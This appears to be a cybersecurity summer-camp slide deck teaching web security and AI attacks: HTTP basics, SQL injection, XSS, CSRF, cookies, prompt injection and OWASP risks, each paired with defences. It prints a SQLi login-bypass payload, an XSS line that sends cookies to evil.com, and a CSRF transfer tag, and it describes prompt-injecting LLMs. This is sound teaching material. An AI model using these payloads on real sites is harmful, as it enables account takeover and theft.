Day 4: Web Security and AI Attacks

CyberQuest Summer Camp - day deck

This is your hands-on companion to the main course deck. The main deck (Interactive_Slides.html) sends you to specific Parts here and to Modules in the notebook, then back. You can also run this deck on its own, top to bottom, with the Next arrow.

Morning Kickoff: Motivation & News (09:00 AM - 09:15 AM)

• Case Profile: The 2017 Equifax Data Breach. Attackers exploited an unpatched vulnerability in an open-source web framework, gaining unauthorized access to the personal data of over 140 million people. This illustrates the importance of patch management and timely vulnerability remediation.

Teaching Session I: Core Lecture (09:15 AM - 11:15 AM)

Web Application Deficiencies and SQL Injection (SQLi)

Web applications rely on database backends to store information. If user inputs are concatenated directly into database commands without verification, applications become vulnerable to injection attacks. * Structured Query Language (SQL): The standard programming language used to manage and manipulate relational databases. * SQL Injection (SQLi): An attack where malicious SQL statements are inserted into web form input fields. This fools the database into executing unauthorized commands, allowing attackers to bypass authentication or leak database data.

Blockchain and Cryptocurrency Fundamentals

• Blockchain: A decentralized, distributed ledger technology that securely records transactions across a peer-to-peer network.
• Cryptocurrency: A digital currency that uses cryptographic principles to secure transactions, control the creation of additional units, and verify the transfer of assets on an immutable ledger.

Steganography

• Definition: The practice of concealing a secret message, file, or image within another ordinary file (such as hiding text inside the pixel data of a digital image). Unlike encryption, which hides the meaning of data, steganography hides the existence of the communication.

Artificial Intelligence and Large Language Model (AI/LLM) Security

As applications integrate Large Language Models, new vulnerabilities emerge at the prompt interface layer. * Prompt Engineering: Designing and optimizing text prompts to guide an LLM into generating specific, accurate outputs. * Prompt Injection: An attack where a user crafts malicious input prompts to override an LLM's system instructions, forcing it to ignore safety rules or leak confidential data. * Hallucination: A phenomenon where an AI model confidently generates outputs that are factually incorrect, fabricated, or completely disconnected from reality.

Teaching Session II: Labs & Interactive Tools (11:45 AM - 01:45 PM)

Practical Interactive Tools for Today

1. CTFLearn: Solve beginner-friendly web application challenges focused on identifying hidden parameters and basic injection vulnerabilities.
2. Lakera Gandalf AI Challenge: Use creative prompt injection techniques to trick an LLM into revealing a secret password code across increasingly secure protection layers.

Recap & Tomorrow's Horizon (04:15 PM - 04:30 PM)

• Summary: Today we analyzed SQL Injection web vulnerabilities, explored blockchain structures, and experimented with prompt injection attacks against LLMs.
• Tomorrow Preview: We will enter the Capture the Flag team arena and explore professional career paths, certifications, and academic degrees in cybersecurity.

Your plan for today

6 parts. Press Next to move in order.

1. Part 1. Get oriented - 4 slides
2. Part 2. Learn the basics - 25 slides
3. Part 3. Code along - 1 slide
4. Part 4. Play the free tools - 3 slides
5. Part 5. Test yourself - 4 slides
6. Part 6. Wrap up - 1 slide

PART 1 OF 6

Get oriented

Objectives, key terms, a picture, and the news.

This part is 4 slides. Press Next to begin.

Learning objectives

• Break a URL into its parts and explain an HTTP request.
• Describe two common web attacks and how sites defend against them.
• Explain prompt injection and try the Gandalf challenge.

Vocabulary (acronyms expanded and defined)

• HTTP = HyperText Transfer Protocol: the language browsers and servers use to talk.
• HTTPS = HTTP Secure: HTTP with encryption so others cannot read your traffic.
• URL = Uniform Resource Locator: the address of a page, such as https://example.com.
• HTML = HyperText Markup Language: the code that builds web pages.
• XSS = Cross-Site Scripting: tricking a site into running attacker code in your browser.
• SQL = Structured Query Language: the language used to talk to databases.
• SQLi = SQL Injection: smuggling commands into a site that trusts user input.
• API = Application Programming Interface: a way for programs to talk to each other.
• AI = Artificial Intelligence; LLM = Large Language Model: an AI trained on text that follows instructions.

Picture it

  Browser  --- HTTP request --->  Web server  --->  Database
           <-- HTML response ---             <---
  If the server trusts bad input, an attacker can sneak commands through.

In the news (real and verifiable)

The Open Worldwide Application Security Project (OWASP) publishes the OWASP Top 10, the most critical web risks, and injection flaws like SQL injection have appeared on that list for many years. OWASP also released a Top 10 for Large Language Model applications, and prompt injection is listed as the number one risk. In other words, the bugs you learn today are exactly what professionals worry about.

PART 2 OF 6

Learn the basics

Now go deeper: the core ideas step by step, with quick knowledge checks.

This part is 25 slides. Press Next to begin.

How the web talks

Request and response

Browser  -- HTTP request -->  Server  -->  Database
         <- HTML response --         <--

HTTP = HyperText Transfer Protocol. HTTPS adds encryption.

Knowledge check

HTTPS adds what compared to HTTP?

SQL injection

When sites trust bad input

SQL Injection (SQLi) happens when a site trusts user input and runs it as a database command.

Login: admin' OR 1=1 --

Defense: parameterized queries that never treat input as code.

Knowledge check

SQL injection happens when...

Prompt injection (AI security)

Tricking an AI

A Large Language Model (LLM) follows instructions in text. If untrusted text hides instructions, the model may obey them.

OWASP lists prompt injection as the number one risk for LLM apps. The Gandalf game teaches exactly this.

Knowledge check

Prompt injection targets...

The journey of a web request

Illustration

Most web attacks target the server-to-database step, where untrusted input meets a command.

HTTP methods

Verbs of the web

Status codes

What the server replies

Cookies

How sites remember you

A cookie is a small piece of text the server asks your browser to store and send back each visit, often a session token that proves you are logged in. CTF challenges sometimes hide encoded data in cookies.

Knowledge check

What does the S in HTTPS add?

SQL injection vs a parameterized query

Attack vs Defense

Left: input becomes part of the command. Right: input is bound as data with a placeholder, so it cannot change the command.

Parameterized queries

The real fix for injection

Instead of gluing user input into a command string, you use placeholders and bind the input as data. The database then never treats input as code, which removes SQL injection entirely.

Cross-site scripting (XSS)

Illustration

If a site echoes input without cleaning it, an attacker script runs in other users' browsers. Fix: encode output.

Input validation

Never trust input

Check that input matches what you expect (length, characters, format) and reject the rest. It is a layer of defense, used together with parameterized queries and output encoding.

Some OWASP Top 10 risks

What pros defend against

Knowledge check

Best defense against SQL injection?

What is an LLM?

The AI behind chat assistants

A Large Language Model is trained on huge amounts of text and responds by following instructions written in plain language. It predicts likely text, which is powerful but also why it can be steered by hidden instructions.

Prompt injection vs a guard

Attack vs Defense

Hidden instructions try to override the rules; a guard filters input and refuses. The number one AI risk.

AI hallucinations

Confident but wrong

An LLM can state false things convincingly because it predicts plausible text, not verified facts. Always check important AI output against a trusted source.

Defense in depth

Layers, not a single wall

No single control is perfect, so defenders stack many: input validation, parameterized queries, encoding, least privilege, monitoring, and patching. If one fails, others still hold.

Developer tools

Look under the hood

Your browser developer tools let you view page source, inspect network requests, and read cookies. Security beginners use them constantly to understand how a site really works.

Knowledge check

Prompt injection targets...

Staying legal

Only test what you are allowed to

Practice web attacks only on sites built for it (CTFLearn, your own apps). Attacking real sites without permission breaks the law (the CFAA). The skills are the same; the permission is what matters.

Bug bounties

Getting paid to find flaws

Many companies run bug bounty programs that reward ethical hackers who report vulnerabilities responsibly. It is a legal, real-world path that the web-security skills from today lead to.

How HTTP requests work

Ch 10 §10.1 — the raw conversation

--- Request (browser to server) ---
GET /login HTTP/1.1
Host: example.com
Cookie: session=abc123
User-Agent: Chrome/124

--- Response (server to browser) ---
HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: session=xyz789; HttpOnly; Secure

<html>...</html>

Every web attack manipulates some part of this exchange — the URL, headers, body, or cookies. Understanding the raw request is the first skill of a web pentester.

OWASP Top 10 (2021)

Ch 10 §10.2 — the landmark vulnerability list

SQL injection mechanics

Ch 10 §10.4 — how the query breaks

A login form that builds SQL by string concatenation:

query = "SELECT * FROM users WHERE user='" + username + "' AND pass='" + password + "'"

# Normal input:   username="ada", password="correct"
# Query becomes:  SELECT * FROM users WHERE user='ada' AND pass='correct'

# Attacker input: username="' OR 1=1 --"
# Query becomes:  SELECT * FROM users WHERE user='' OR 1=1 --' AND pass='...'
# 1=1 is always true, -- comments out the rest: logs in as first user

cursor.execute("SELECT * FROM users WHERE user=? AND pass=?", (username, password))

Cross-site scripting (XSS)

Ch 10 §10.5 — injecting scripts into web pages

What attackers do with XSS:

<script>document.location='https://evil.com/steal?c='+document.cookie</script>

This script sends the victim's session cookie to the attacker's server. The attacker then uses that cookie to impersonate the victim without knowing their password.

Session hijacking and cookie flags

Ch 10 §10.7

After you log in, the server gives your browser a session cookie. Whoever holds that cookie controls your account.

CSRF: cross-site request forgery

Ch 10 §10.6 — making the victim's browser act

The browser automatically sends cookies with every request to a site. An attacker embeds a request to your bank on evil.com:

<!-- On evil.com -- victim's browser sends this to bank.com -->
<img src="https://bank.com/transfer?to=attacker&amount=500">

If the victim is logged into bank.com, their session cookie is sent automatically and the transfer succeeds.

AI attack taxonomy

Ch 17 §17.12 — four ways to attack AI systems

AI-powered social engineering

Ch 4 §4.10-4.11 — deepfakes and synthetic identities

Traditional phishing: mass email blast, obvious typos, generic message.

AI-powered spear phishing: personalized, grammatically perfect, uses public LinkedIn/social data to craft a targeted message from a "colleague".

Knowledge check

Which OWASP Top 10 category covers SQL injection?